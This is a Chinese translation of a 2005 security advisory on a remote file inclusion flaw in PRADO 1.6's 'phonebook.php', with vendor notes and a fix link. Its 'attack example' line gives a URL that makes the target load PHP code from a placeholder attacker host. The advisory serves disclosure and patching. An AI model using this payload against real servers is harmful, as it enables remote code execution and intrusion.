[翻译]PRADO 'phonebook.php'文件包含缺陷允许远程用户执行任意命

本文作者： 剑心[B.C.T]
文章出处： 原创翻译
翻译网站： http://www.bnso.net/

安全公告:1012813
公告地址:http://securitytracker.com/id?1012813
更新日期:2005.1.10
首发日期:2005.1.10
漏洞危害:通过网络执行任意代码，敏感信息泄露
漏洞修补:可以
漏洞利用:可以
厂商确认:是
软件版本:1.6
漏洞描述:Paul Brereton在PRADO中发现了一个漏洞。一个远程用户可以在目标 系统上执行任意代码。
'phonebook.php'脚本没有验证用户提供的'page'变量。远程用户可以发送一个精心构造的URL导致在远程服务器包含任意的Php代码，并且在目标系统上执行它们。任意的php代码包刮操作系统的命令，都将以目标服务器上的web服务权限运行。
攻击示例:
http://[target]/examples/phonebook.php?page=http://[attacker]/evilco de.txt%00&filter=P
已经告知厂商。
漏洞影响:远程用户以web服务进程权限在目标系统上执行任意的Php代码，包刮一些操作系统命令。
解决办法:厂商已经发布修补版本。
http://sourceforge.net/project/showfiles.php?group_id=118087
厂商地址:www.xisc.com/
漏洞原因:输入验证错误。
系统平台:任意Unix,Linux及windows版本
漏洞发布:SecuriTeam <support@securiteam.com>
相关记录:无